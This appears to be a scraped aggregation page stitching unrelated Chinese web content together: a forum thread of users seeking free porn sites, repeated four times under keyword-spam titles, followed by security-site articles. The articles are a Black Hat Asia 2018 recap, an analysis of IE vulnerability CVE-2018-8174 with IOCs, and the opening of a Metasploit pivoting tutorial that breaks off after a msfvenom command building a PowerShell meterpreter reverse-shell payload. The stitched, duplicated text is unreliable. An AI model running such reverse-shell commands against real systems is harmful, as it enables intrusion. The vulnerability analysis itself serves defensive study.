黄网网站

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

求黄网

悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

求av网站

求av网站悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

黄网址

黄网址悬赏积分问答
goback
add
求一个黄色网站 不用下载直接观看的那种
1193129 点击·12 回帖
a1321432614 a1321432614 楼主
嘿嘿 没事的时候看看
14
最新喜欢:

123456…
回复
黑手_疯子 黑手_疯子 1楼
请勿回复网址 否则给出网址的会员 将被禁言!

请遵纪守法!
[Angusfz于2019-01-04 17:07编辑了帖子]
回复 喜欢 评分
a1321432614 a1321432614 2楼
什么私聊 你给我一个呗
回复 喜欢 评分
adam333 adam333 3楼
已私信你了。。楼主
回复 喜欢 评分
新手、小杰 新手、小杰 4楼
我呢 . 也给我发一个吧,
回复 喜欢 评分
hjw162423322 hjw162423322 5楼
5654用545用用
回复 喜欢 评分
hjw162423322 hjw162423322 6楼
34如同让她2让2
回复 喜欢 评分
hjw162423322 hjw162423322 7楼
3如如让
回复 喜欢 评分
497570697 497570697 8楼
也给我来个吧
回复 喜欢 评分
新手、小杰 新手、小杰 9楼
给我私信 我也要。
回复 喜欢 评分
1 2 下一页

切换至电脑版

Powered by phpwind.me ©2003-2014
晋ICP备18009968号-5

0daybank

blackhat

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
Blackhat ASIA 亚洲黑帽大会精彩回顾(附全套PPT下载链接)
阅读量 26637 | 评论 1

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-03-29 11:25:31

大会官网:https://www.blackhat.com/

Blackhat PPT 打包下载 (提取码:f475)

大会简介
今年3月份,安全圈最为火爆的顶级信息会议之一“BlackHat”即将于3月20日在新加坡滨海湾金沙酒店举行。每年这个时候,数以万计的黑客云集在一起,展示最前沿的研究、研讨最高深的技术。BlackHat是信息安全行业公认的最高盛会,也是黑客大咖炫技的舞台,被称为黑客的“奥斯卡”。同时,对黑客来说,受邀参加“BlackHat”也是无上的荣耀。

大会时间
2018年3月22日10:00 – 18:30

2018年3月23日10:00 – 16:15

大会地点
新加坡滨海湾金沙酒店

议题介绍
本次大会议题精彩纷呈,安全客小编特意为大家甄选了与网络安全密切相关的几个议题并附上了相关议题的介绍:

MobSF-移动安全框架
(小编为大家附上github相关链接)

移动安全框架MobSF是一款多合一的智能开源移动应用自动化渗透测试框架,该框架可对Android、iOS和Windows等移动端操作系统的应用程序进行快速地静态或动态安全分析,并支持APK、IPA、APPX和压缩源码等多种形式的源码。除此之外,MobSF还可以利用API fuzzer来对Web API进行安全测试,其中包括信息收集、分析安全Header、识别移动端API漏洞(例如XXE、SSRF、路径遍历和不安全的直接对象引用等漏洞)、以及其他安全任务。

主讲人:Ajin Abraham

研究方向:Android、iOS、移动安全

内容亮点:移动安全框架MobSF是一款多合一的智能开源移动应用自动化渗透测试框架,该框架可对Android、iOS和Windows等移动端操作系统的应用程序进行快速地静态或动态安全分析,并支持APK、IPA、APPX和压缩源码等多种形式的源码。除此之外,MobSF还可以利用API fuzzer来对Web API进行安全测试,其中包括信息收集、分析安全Header、识别移动端API漏洞(例如XXE、SSRF、路径遍历和不安全的直接对象引用等漏洞)、以及其他安全任务。

APT2-自动化渗透测试工具包
(小编为大家附上github相关链接)

主讲人:Adam Compton

研究方向:网络攻击

内容亮点:几乎每一次渗透测试都是开始于NMAP扫描的,然后研究人员需要根据扫描结果来选择有意思的服务进行枚举和攻击,最后实现后渗透利用。在此之前,这是一个需要耗费大量时间的人工操作过程,而随着自动化渗透测试工具包APT2的诞生,这一切都可以自动化实现了。APT2是一个可扩展的模块化框架,可用于自动化执行各种常见的网络安全任务,并利用各种模块来构建动态攻击路径。遇到了FTP、Telnet或是SSH?没关系,APT2可以完成很多常见的身份认证。遇到了SMB?别担心,APT2可以判断当前目标设备所运行的操作系统,并寻找共享会话和其他有价值的信息。APT2自带的模块可以帮助研究人员进行服务枚举、网络扫描和暴力破解等任务,并且还整合了功能强大的Metasploit。简而言之,APT2可以从多个方面帮助研究人员节省他们的时间。

钱骡的狩猎季—— 针对金融机构的APT攻击
Lazarus, Bluenoroff和Andariel,这三个被认为来自于同一个国家的臭名昭著的APT组织,最近又发动了多起针对金融机构的APT攻击,包括韩国、EMEA、ATM公司以及比特币交易平台等都在被攻击目标之列。演讲者分别以四个攻击案例,介绍了攻击者使用的恶意软件分析成果,使用了哪些漏洞以及一些关键攻击手段,并详细介绍了演讲者是如何O通过分析出的细节进一步去挖掘出攻击者所使用的C&C网络的基础架构。

沙漏模式2.0:东南亚地下服务滥用全球2FA案例分析
主讲人:Anna Chung

该演示从引入沙漏模型2.0开始,该模型允许研究人员有限地访问地下市场,以进一步收集可用于威胁预防和缓解计划开发的安全情报线索。为了更好地理解如何利用这种模式,本次演讲的第二部分将以东南亚的2FA绕开地下服务为例进行研究。研究人员采取了一种看不见的地下广告,并开始对威胁行为者的概况,工具,策略,程序,受害者以及整个地下市场景观进行认真研究。演示文稿旨在分享我们迄今为止学到的内容,并向安全社区提供早期警告。

更多详情点击议题pdf

XOM-SWITCH: 使代码免于遭受重用攻击
主讲人:Mingwei Zhang 、 Ravi Sahita 、 Daiping Liu

内容亮点:介绍了一款名为XOM-switch的安全工具,此工具可以用于缓解ROP、JIT Spray等漏洞利用手段。并且解决了在实际部署、性能开销等方面的问题。

更多详情点击下载ppt

KSMA:利用ARM MMU特性打破Android内核隔离和Root权限
主讲人:王勇 、 杨成明 、 丁宝曾 、杨松

(主讲人姓名或因音译有所误差,详情请点击链接查看,也请及时告知我们~)

本次议题先介绍ReVent Rooting Solution,它来源于Use-After-Free(UAF)漏洞,该漏洞会影响所有安装有大于3.18 Linux内核的Android设备,并且可以由任何不受信任的应用程序执行。为了绕过Android 8.0上的PXN和PAN防护措施,我们将引入一种新的内核开发技术,即内核空间镜像攻击(KSMA)。它来源于ARM MMU的功能,使攻击者能够在没有任何系统调用的情况下从用户模式(EL0)读取内核文本/数据虚拟地址。此外, rooting solution CPRooter也将被详细介绍。

更多详情请见相关pdf文档。

如何消除小于16字节的WINDOWS控制流保护
议题讲者:Andrea Biondo 、 Mauro Conti 、 Daniele Lain

Microsoft Control Flow Guard (CFG)是目前在所有Windows操作系统上的控制流完整性机制,存在于Windows 8.1到最近更新的Windows 10,保护了5亿多台机器。可以Windows CFG进行了攻击,从而达到任意代码执行的目的。我们利用CFG在精度、性能和向后兼容性方面的特性,以及CFG设计的固有缺陷来逃避CFG。在这次演讲中,我们将展示我们如何注意到这个设计漏洞,我们如何在它之上构建我们的攻击,以及它的预期影响。最重要的是,我们展示了它在现实世界中的可行性,它将它作为远程代码执行的一部分,在64位Windows 10上运行Microsoft Edge web浏览器。

更多详情请戳链接

FACT-固件分析及对比工具
主讲人:Peter Weidenbach

研究方向:硬件/嵌入式

内容亮点:FACT是一款固件分析及对比工具,该工具可以自动化进行固件安全分析。FACT带有Web GUI用户界面,因此使用起来非常简单。它不仅整合了REST API,而且易于扩展(带有插件系统)。在分析固件时,研究人员可能会遇到以下几个“难题”:解封装文件、初始分析、识别版本更改、以及寻找存在类似漏洞的其他固件镜像等等。而FACT可以帮助研究人员自动化完成这些任务,并加速固件的安全分析过程。这也就意味着,研究人员可以将自己的注意力放在寻找并分析新漏洞的任务上,而FACT可以帮助他们完成所有“无聊”的事情。

Trape -实时网络钓鱼工具
主讲人:Jhonathan Espinosa、Jose Pino

研究方向:OSINT-公开资源情报

内容亮点:Trape是一款识别工具,它可以帮助研究人员对目标用户进行实时跟踪,并对其展开网络钓鱼攻击。需要注意的是,Trape所能收集到的数据是非常非常详细。该工具的目标是向广大用户宣传网络钓鱼的危害以及可能的安全风险,很多大型网络公司都会对用户进行监控、并获取除了IP地址之外的很多信息,例如网站会话或互联网服务信息等等,而Trape就是为了告诉用户这个可怕事实。

NetRipper -针对渗透测试人员的智能流量嗅探工具
主讲人:Ionut Popescu

研究方向:恶意软件防御

内容亮点:NetRipper是一款针对Windows操作系统的后渗透利用工具,该工具使用了API Hooking技术来拦截目标主机中的网络流量。除此之外,它还为低权限用户提供了加密相关的功能,可帮助用户捕捉到明文流量以及加密流量。

WipiHunter -可疑无线网络活动检测工具
主讲人:Besim Altinok、Mehmet Kutlay Kocer

研究方向:网络防御

内容亮点:WipiHunter可以用来检测无线网络环境中的非法/可疑活动,实际上,它更是一种安全策略,安全研究人员可以通过这个项目来得到更多新的观点和想法,并设计出用于检测无线网络非法活动的新型技术。

FLARE VM
主讲人:Peter Kacherginsky

研究方向:恶意软件防御

内容亮点:需不需要我帮你快速创建一台安装有完整分析工具的Windows虚拟机?需不需要我帮你把虚拟机中所有的安全工具自动更新为最新版本?如果你点头了,那FLARE VM就是你需要的东西。FLARE VM是目前第一款免费开源的整合了各种安全工具的Windows虚拟机(Windows 7+),逆向工程师、恶意软件分析人员、应急响应人员、取证专家和渗透测试专家都可以利用这款工具来配置自己的安全环境。FLARE VM借鉴了Kali Linux的设计理念,它是一个高度可配置的平台,并带有完整的Windows安全工具集,其中包含调试器、反汇编器、反编译器、网络分析工具、Web安全评估工具、漏洞挖掘/利用工具、以及静态/动态分析工具等等。除此之外,FLARE VM还配置有易于使用的安装包管理系统,可帮助用户根据自己的需要快速部署/移除第三方工具或对平台环境进行配置修改。

CS Suite-AWS/GCP安全审计一站式工具
主讲人:Jayesh Chauhan、Shivankar Madaan

研究方向:网络防御

内容亮点:如今,云端基础设施几乎是各大公司都需要使用的一项服务,而且绝大多数的大型企业都已经完全转向云计算服务了,因此云端安全也就理所当然的成为了人们关注的焦点。虽然AWS &GCP不仅给用户提供了很多传统的安全保护方法,而且还有一套完整的认证及配置体系。但是很多用户都要根据自己的需求来创建/分配云端资源,因此在实施的过程中难免会出现违反云端安全配置策略的情况。人类的错误是不可避免的,因此这样的人为失误可能会对云端环境造成灾难性的破坏。

虽然现在有很多开源工具可以对AWS/GCP进行安全审计,但是它们所能进行的安全任务并不完整。另外,配置和使用各种工具并查看各种检测结果也是一件非常痛苦的事情。因此,CS Suite便应运而生。CS Suite是一款用于对AWS/GCP基础设施进行安全状况审计的一站式工具,而且它还可以进行操作系统安全审计。目前的开源安全审计工具拥有的功能CS Suite几乎都有,而且功能还更加强大。除此之外,CS Suite还支持JSON输出,研究人员可将输出结果进一步使用。

Horus-二进制代码库安全扫描引擎
主讲人:Jiashui Wang、Qin Chen

研究方向:漏洞评估

内容亮点: Horus是一款针对移动安全领域的扫描引擎,它可用来检测二进制代码库中的安全风险,其中包括代码漏洞和恶意行为等等,而且支付宝目前也在使用Horus。Horus是一款基于规则设定的安全框架,由于移动端App需要使用大量的第三方库(例如libopenssl和libffmpeg等等),因此Horus可支持多种类型源码库的安全扫描。通过添加或修改已定义的规则(CVE、补丁或txt),用户可以了解代码库中可能存在的漏洞、后门或其他恶意代码,而且当前的Horus版本还可以从代码函数、代码模式和代码指令等多个层面来识别目标库中的可疑行为。

本次报道由安全客特派安全研究员进行的实地跟进报导,更多议题详情请见官网链接

商务合作,文章发布请联系 dengjinling@360.cn
Blackhat 活动

安全客 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
网瘾患者
换一个
|评论列表
匿名用户 · 2018-03-29 16:33:24 回复
感觉翻译得不太科学,比如控制流保护那个,难道讲的不是“如何用不到16字节逃避CFG”吗?

安全客
有思想的安全新媒体
文章
1134
粉丝
52
TA的文章
关于境内大量家用路由器DNS被篡改情况通报
2019-02-21 13:35:02
GitHub上发布后即登顶的老司机渗透教程,你的小本本备好了吗?
2019-02-20 19:35:06
256万人脸识别数据遭泄露,“脸”还安全吗?
2019-02-15 19:22:33
日政府授权入侵公民物联网设备
2019-02-01 13:49:08
360网络安全周报第195期
2019-01-25 18:18:17
输入关键字搜索内容
相关文章
DVP新年活动 | 新年新气象,开工送福利
中奖名单公布 | 2018安全客年终大调查,最懂我的还是你!
ASRC新年活动 | 三重奖励等你来拿!
活动 | “(ACSS2019) 第四届中国汽车网络信息安全峰会 2019”即将召开
点融开源AgentSmith HIDS— 一套轻量级的HIDS系统
FOFA携手DVP开启双旦礼物!
叮叮当 | 辞旧迎新,愿老铁平安喜乐
热门推荐
文章目录
大会简介
大会时间
大会地点
议题介绍
MobSF-移动安全框架
APT2-自动化渗透测试工具包
钱骡的狩猎季—— 针对金融机构的APT攻击
沙漏模式2.0:东南亚地下服务滥用全球2FA案例分析
XOM-SWITCH: 使代码免于遭受重用攻击
KSMA:利用ARM MMU特性打破Android内核隔离和Root权限
如何消除小于16字节的WINDOWS控制流保护
FACT-固件分析及对比工具
Trape -实时网络钓鱼工具
NetRipper -针对渗透测试人员的智能流量嗅探工具
WipiHunter -可疑无线网络活动检测工具
FLARE VM
CS Suite-AWS/GCP安全审计一站式工具
Horus-二进制代码库安全扫描引擎
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

ie漏洞

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
CVE-2018-8174:IE最新漏洞分析
阅读量 35048 | 评论 2 稿费 180

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-05-10 11:58:03
译文声明
本文是翻译文章,文章原作者,文章来源:https://securelist.com
原文地址:https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/

译文仅供参考,具体内容表达以及含义原文为准

×

一、前言
2018年4月下旬,我们利用沙箱环境发现了Internet Explorer(IE)的一个最新0day漏洞,而这距离IE漏洞上一次在野外被利用(CVE-2016-0189)已经过去了2年时间。这个漏洞以及相关利用技术在某些方面较为有趣,本文详细分析了这个漏洞(CVE-2018-8174)的根本原因。

二、捕获0day漏洞
故事开始于2018年4月18日,当时有人往VirusTotal(VT)上传了一个有趣的漏洞利用程序。包括卡巴斯基在内的多个AV厂商成功检测到了这个利用程序,我们将该程序标记为针对老版本Microsoft Word漏洞的通用启发式逻辑类别。

img

图1. Virustotal上对CVE-2018-8174的扫描结果

使用我们的沙箱系统处理这款恶意样本后,我们注意到即便打上完整补丁的Microsoft Word也会被成功利用。根据这个信息,我们开始深入分析这个利用程序。我们先来看一下完整的感染链:

img

图2. 感染链

这条感染链包含如下几个环节:

1、受害者收到一个恶意Microsoft Word文档。

2、打开这个恶意文档后,样本会下载第二阶段的利用程序,即包含VBScript代码的HTML页面。

3、VBScript代码会触发UAF(Use After Free,释放后重用)漏洞并执行shellcode。

三、初步分析
我们针对RTF(Rich Text Format)文档开始研究,攻击者利用该文档来投递针对IE的利用程序。该文档只包含一个对象,其内容经过混淆处理,这是一种已知的混淆技术,我们称之为“nibble drop(半字节)”混淆技术。

img

图3. RTF文档中经过混淆处理的对象

去除混淆并解密16进制数据后,我们发现这是一个OLE对象,其中包含一个URL Moniker.aspx) CLSID。因此,漏洞利用程序最开始的处理方式与之前的一个漏洞(CVE-2017-0199)类似,该漏洞用到了Microsoft HTA处理程序。

img

img

图4&5. 使用URL Moniker来加载IE漏洞利用载荷

在CVE-2017-0199漏洞中,Word会尝试根据文件的属性,使用默认的文件处理程序来执行文件,比如服务器响应报文中的Content-Type HTTP头部字段就是其中一个属性。由于application/hta这个Content-Type所对应的默认处理程序为mshta.exe,因此Word会选择其作为OLE服务器,不受限制地运行脚本。这样攻击者就可以直接调用ShellExecute,启动所选择的攻击载荷。

然而,如果我们检查最新利用程序中嵌入的URL时,我们发现服务器响应中的Content-Type并非application/hta(CVE-2017-0199漏洞需要满足这个条件),而是text/html。与text/html对应的默认OLE服务器为mshtml.dll,这是包含IE后端引擎的一个程序库。

img

图6. WINWORD.exe查询注册表确定正确的OLE服务器

此外,该页面包含一个VBScript,加载该脚本时会使用一个安全模式标志(默认值0xE)。这样一来攻击者无法直接执行攻击载荷,这与HTA处理程序的情况一样,需要使用一个IE漏洞才能突破这个限制。

微软在针对Moniker相关漏洞(CVE-2017-0199、CVE-2017-8570以及CVE-2017-8759)的补丁中引入了激活过滤器,利用该过滤器,应用程序可以限制在运行时实例化的COM对象,因此攻击者有可能可以使用URL moniker来加载远程web页面。

img

图7. 被过滤的某些COM对象,限制使用MSO.dll中的IActivationFilter来创建这些对象

在分析样本时,过滤后的CLSID列表包含16个表项。MSHTML CLSID({{25336920-03F9-11CF-8FD0-00AA00686F13}})不在该列表中,因此攻击者可以在Word上下文环境中成功创建MSHTML COM服务器。

现在起事情开始变得有趣起来。尽管Word文档是攻击者使用的最初攻击媒介,但漏洞实际上位于VBScript中,而非Microsoft Word中。这是我们第一次看到有攻击者使用URL Moniker来加载IE漏洞利用载荷,我们相信恶意软件开发者会在未来大量应用这种技术。利用这种技术,攻击者可以使用IE引擎加载并渲染web页面,即便受害者主机上的默认浏览器并非IE浏览器。

下载的HTML页面中的VBScript包含一些函数名及整数值,这些信息都经过混淆处理。

img

图8. 经过混淆处理的IE漏洞利用载荷

四、漏洞原理分析
为了分析漏洞原理,我们只需查看去混淆后脚本中的第一个函数(即TriggerVuln),程序在调用RandomizeValues以及CookieCheck函数后就会调用该函数。

img

img

图9&图10. 去混淆脚本中的漏洞触发过程

为了获得所需的堆布局,确保已被释放的类对象内存会被ClassToReuse对象再次复用,漏洞利用程序会分配一些类对象。触发漏洞的代码可以精简为如下PoC代码:

img

图11. CVE-2018-8174漏洞PoC代码

当我们使用启用了页堆的IE浏览器运行这个PoC时,我们可以观察到OLEAUT32!VariantClear函数会发生崩溃:

img

图12. 调用被释放的内存时出现访问冲突(Access Violation)异常

img

图13. 当销毁第二个数组(ArrB)时会复用被释放的内存指针

利用这个PoC代码我们成功触发了一个UAF漏洞,ArrA(1)以及ArrA(2)都会引用内存中的同一个ClassVuln对象。这种情况有可能会出现,因为当Erase ArrA被调用时,vbscript!VbsErase函数会确定待删除的对象类型为SafeArray,然后再调用OLEAUT32!SafeArrayDestroy。

然后函数会检查指向tagSafeArray.aspx)结构的指针不为NULL,同时检查指针的引用计数(存储在cLocks字段中)是否为0,然后继续调用ReleaseResources。

img

图14. ArrA(1)的VARTYPE为VT_DISPATCH,因此会调用VBScriptClass::Release来销毁对象

而ReleaseResources会检查fFeatures这个标志变量,由于我们有一个VARIANT数组,因此该函数随后会调用VariantClear,VariantClear函数会遍历数组中的每个成员,执行必要的去初始化操作,并且根据需要调用相关的类析构函数。在我们分析的这种情况中,由于ArrA(1)的VARTYPE为VT_DISPATCH,因此程序会调用VBScriptClass::Release来正确销毁对象,处理类似Class_Terminate之类的析构函数。

img

图15. CVE-2018-8174的根本原因:在TerminateClass函数之前只检查一次reCount

这正是这个漏洞的根源所在。在VBScriptClass::Release函数内部,程序只在函数开头检查了一次引用计数值。即使该值很有可能会在重载的TerminateClass函数中递增(PoC代码中的确这么处理),最终释放类对象前并没有再做任何检查。

Class_Terminate是一个被弃用的方法,现在已经被Finalize过程所取代。在对象销毁过程中,程序会使用该函数来释放已获取的资源,一旦对象被设置为空并且该对象没有其他引用时就会立即执行该函数。在我们的例子中,Class_Terminate被代码重载,当调用VBScriptClass::TerminateClass时,会转到对应的重载方法。在重载方法内部又创建了ArrA(1)成员的另一个引用。此时ArrB(1)引用了ArrA(1),其中包含一个即将被释放的ClassVuln对象。

img

图16. 释放第二个对象时调用了无效的虚方法而导致崩溃

当Class_Terminate子函数处理完毕后,Arr(1)所对应的对象被释放,但ArrB(1)仍然保持被释放的类对象的引用。当执行流程继续时,ArrB会被擦除,再次执行类似逻辑,不过这一次ArrB(1)引用了一个被释放的ClassVuln对象,因此当程序调用ClassVuln vtable中的某个虚方法时,我们就可以观察到崩溃现象。

五、总结
在这篇文章中,我们分析了CVE-2018-8174漏洞背后的核心原因,这是一个特别有趣的UAF漏洞,漏洞成因在于Class_Terminate这个VBScript方法没有正确处理相关对象的生命周期。漏洞利用过程与我们在之前漏洞(CVE-2016-0189以及CVE-2014-6332)中看到的利用过程不一样,原因在于Godmode(上帝模式)技术已经不再适用。整个漏洞利用链与漏洞本身一样有趣,但本文对此不再赘述。

CVE-2018-8174漏洞是利用URL moniker来加载IE漏洞载荷的第一款漏洞,除非这种技术被修复,否则我们认为攻击者未来将大量滥用这种技术,无视受害者系统上的默认浏览器设置,强制使用IE来加载攻击页面。

我们预计该漏洞将在不久的将来成为攻击者最喜欢的突破口,相信漏洞利用工具包开发者很快就会在驱动式(通过浏览器感染)以及渔叉式钓鱼(通过文档感染)攻击活动中滥用这种技术。为了保证自身安全,我们建议大家采用最新的安全更新,适用具备行为检测功能的安全解决方案。

在我们看来,这个漏洞实际上就是360核心安全团队最近发现的浏览器“双杀”漏洞。虽然漏洞利用技术并不限于浏览器范畴,但仍被归类为IE 0Day漏洞,这给安全社区带来了一些混乱。

发现这个漏洞后,我们第一时间与微软分享了相关信息,微软确认该漏洞为CVE-2018-8174漏洞。

六、检测方法
卡巴斯基实验室产品可以成功检测并阻止整个利用链及相关载荷,具体如下:

1、将RTF文档标记为HEUR:Exploit.MSOffice.Generic

2、将IE漏洞利用技术标记为PDM:Exploit.Win32.Generic,可以使用自动漏洞防护技术来防护

3、将IE漏洞利用技术标记为HEUR:Exploit.Script.Generic

4、将攻击载荷标记为HEUR:Trojan.Win32.Generic

七、IOC
RTF文档:

b48ddad351dd16e4b24f3909c53c8901
IE漏洞利用技术(CVE-2018-8174)

15eafc24416cbf4cfe323e9c271e71e7
攻击载荷

1ce4a38b6ea440a6734f7c049f5c47e2
相关网址

autosoundcheckers[.]com
本文翻译自 https://securelist.com, 原文链接 。如若转载请注明出处。
漏洞分析 CVE-2018-8174 IE最新漏洞

興趣使然的小胃 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
黑帽子
换一个
|评论列表
越南邻国宰相 · 2018-06-11 16:27:57 回复
补丁未在 引用计数这里打补丁,而是在 变体类型做的更正~~所以说你说的根本原因是不太对的。

Ox9A82 · 2018-07-14 23:23:15 回复
感觉分析还是挺清楚的呀

興趣使然的小胃
肥叶好香锅,孜孜不倦
文章
332
粉丝
55
TA的文章
Dirty Sock:Ubuntu提权漏洞分析
2019-02-14 11:00:09
Chrome扩展在持久化中的应用
2019-02-14 10:30:31
Foxit Reader SDK ActiveX漏洞分析
2019-02-13 15:30:20
S4U2Self在活动目录持久化中的应用
2019-02-01 11:35:14
浅谈Flask cookie与密钥的安全性
2019-01-31 14:30:30
输入关键字搜索内容
相关文章
【缺陷周话】第22期:错误的内存释放对象
CVE-2018-19134:通过Ghostscript中的类型混淆来远程执行代码
Typora XSS 到 RCE (上)
Nexus Repository Manager 3 远程代码执行漏洞 (CVE-2019-7238) 分析及利用
VBScript in 2018
Dirty Sock:Ubuntu提权漏洞分析
Foxit Reader SDK ActiveX漏洞分析
热门推荐
文章目录
一、前言
二、捕获0day漏洞
三、初步分析
四、漏洞原理分析
五、总结
六、检测方法
七、IOC
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

msf

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】使用 MSF 路由转发实现MSF框架的内网渗透
阅读量 179609 | 评论 14 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-07-28 11:16:13
http://p4.qhimg.com/t014125d6bf68f24b99.jpg

作者:myles007

预估稿费:300RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

一、利用过程

1.1 利用背景

我们在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,而内网渗透的思路和方法可能很多,但是使用起来并不是很方便,可能会需要很庞大的工具箱的支持,具体内容这里不做展开说明。

我们现在假设的场景是,此时我们已经拿下一台内网服务器的远程桌面环境,在进行内网渗透时,发现内网有大量存MS17-010的漏洞主机,如果我们想拿下这些主机,可能就要动用NSA工具箱,但是此工具箱的使用相当的麻烦,此时我们第一时间想起的一定是神器Metasploit,其是进行内网渗透的一把利器,且使用方便,但是我们同样不能将这么大的一个框架部署到“沦陷的主机”上吧。那么问题来了,我们有没有好的办法直接使用我们外网已经搭建好的MSF框架呢?这里提供大家一个思路,我们是不是可以利用“沦陷主机”作为跳板,来实现使用MSF框架直接对内网主机的直接渗透呢?答案是当然的,MSF框架为我们提供了一个很好功能跳板版能模块,此模块可以为我们添加一条转发路由去往内网,具体内容会在下面的文档中为大家揭晓。

1.2 利用场景拓扑

http://p7.qhimg.com/t01b155a949dd0b499b.png

1.3 利用场景思路

本篇文档,我们使用的方法和思路,就是结合powershell ps1 攻击载荷来在“沦陷主机”上直接反弹回一个session会话,然后利用此session会话作为MSF访问内网的跳板(即路由的下一跳(nexthop)网关),从而来实现MSF直接对内网主机资源的直接访问。

利用条件:

(1)已经拿下的webshell 的 Windows服务器;

(2)powershell ps1会话反弹

(3)MSF跳板路由添加

二、利用过程分析

2.1 生成powershell反弹

如果想要利用MSF攻击平台直接对内网其他主机进行渗透攻击,那么我们的MSF平台需要要有去往“目标内网的路由”,但是我们知道“目标内网服务器”除了对外服务的服务器我们可以直接访问,其实内网其他主机都是私有IP,无法由互联网直接访问的,这时我就需要在MSF平台添加一条路由去往内网,而MSF平台就有这个“路由转发的功能”,而且这一去往内网路由的下一跳就是建立在MSF平台与“目标主机”之间session会话上的。所以,我们在使用MSF路由转发功能时,首先就是要先建立一个“MSF平台”与“目标主机”的session会话。

因为笔者前面已经说过直接产生dll 反弹shell的方法,这里就在学习与记录下反弹powershell ps1的shell反弹过程。

2.1.1 使用MSF生成一个反弹的 ps1的shell

反弹shell生成语句如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1
